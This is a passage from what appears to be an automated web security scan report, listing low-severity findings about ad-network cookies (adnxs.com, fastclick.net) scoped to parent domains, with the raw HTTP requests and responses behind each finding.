9%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 21:57:57 GMT
Content-Length: 522

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-61525102_1296251877,11d765b6a10b1b3,polit,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-c
...[SNIP]...

10.92. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly
acb461348=5_[r^208WMM2x@N!@@-##ICj)?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP-ZzLIcOH5QUBWHfHSmrEELIcENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA5gUBAgUCAAUAAAAAASKOJgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296265416%29%3Buf%28%27r%27%2C+116344%2C+1296265416%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.93. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<fQCe7?0P(*AuB-u**g1:XIC(WUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy6A3fm`:Idk3X!(*W2F2Hk''SykpRE%:434AnQ9O>WxYDWB13NOp+/5AIyhgU6ROEcF@:XJvR6qJ:uuL`8Q2Vw2t![$ph'S1S['D+Ir$>37Xp$KdW'FoQ)MSzM(Q66u2x%X_(L:Sjx('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o>Pj9!*^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 21:57:44 GMT
Content-Length: 664

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-48597195_1296251864,11d765b6a10b1b3,Miscellaneous,cm.cm_aa_gn1-cm.sportsreg-cm.spo
...[SNIP]...

10.94. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly
acb521874=5_[r^208WMM2x@N!@@-#!0*E$?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP-6NVCCYA2IZBWHfHSmrEELEcENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAAhwQBAgUCAAUAAAAAwSGHKgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296265412%29%3Buf%28%27r%27%2C+116344%2C+1296265412%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-256627_1296258325%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D357355%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb780011=5_[r^208WMt+t%s!@@-#bPpSh?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP_qJUyg65S1xBWHfHSmrEEKASkNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAApQQBAgUCAAUAAAAABSGv_AAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296255616%29%3Buf%28%27r%27%2C+151403%2C+1296255616%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2811%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2887%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28619%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28620%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28621%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v

Response

10.95. http://ib.adnxs.com/ttj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ttj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ttj?id=57040&pubclick=http://yads.zedo.com/ads2/c%3Fa=775740%3Bn=951%3Bx=2304%3Bc=951000002,951000002%3Bg=172%3Bi=6%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=6%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=6%3Bse=1%3Bk=&cb=0.14057195745408535 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb266870=5_[r^208WMuF4Lw)IE.8qu]==?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPyqFBR3BpJpcBWHfHSmrEEKwRUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEsAQBAgUCAAIAAAAAHyH9zwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254384%29%3Buf%28%27r%27%2C+151403%2C+1296254384%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2811%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2887%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28619%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28620%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28621%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

10.96. http://media.fastclick.net/w/click.here previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/click.here

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

srb=BAEAAAABIAMDPnJDTSAGYAsCLywEIAmACwAGIAcDAAAAAA==; domain=.fastclick.net; path=/; expires=Mon, 31-Jan-2011 05:00:38 GMT
oatmeal=10070:256698:477674:54816:0:1295977917:3|10489:276818:522556:54393:0:1296277238:0|; domain=.fastclick.net; path=/; expires=Mon, 28-Feb-2011 05:00:38 GMT
adv_ic=ByAAAAD2nkNNIAYGAAFDAAACWyADIAtAAAFBd6AXBEkAALZRIB9AFCAAAT5yoBcgLwH8SOABFwHwcaAXIC8B+l3gARfgAy8BaF7gARcAZOACLwCr4AIXAD3gAl8AsOACFwBh4AIvAZlQ4AFH4AMvAeFZ4AEXAFjgAi/gA3cAVuACFwDkIKvA1wIes0DhAAcAqSDXAGAg60AAAFDgAi8Ei1wAAARAFCAAAr0NP+AALwAbIHcAdiATQAAATeACLwDVIC/BTwBL4AIXAdtX4AF3AErgAhcAGuACjwBB4AIXAD/hAgcAIOACFwB5Ia/AvwAd4AIXAMXgAi8AGOACF+EDT+ADFwFlOOABRwFc1aEHIIsAZOACFwCLwO8gFwTNTwAAA0DsIAAAVeACFwFHU+ABRwAm4AIXAA/gAo8AA+ACFwAY4AIXAf4MoU8gXwG3WuABRwDc4AIXAMbgAhcA2OACFwAo4AJHAMTgAhcAFeACFwCr4AIXAXlHwF8BAAA=; domain=.fastclick.net; path=/; expires=Sun, 29-Jan-2012 05:00:38 GMT
pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Mon, 28-Jan-2013 05:00:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/click.here?cid=276818;mid=522556;m=1;sid=54393;c=0;tp=5;forced_click=\ HTTP/1.1
Host: media.fastclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
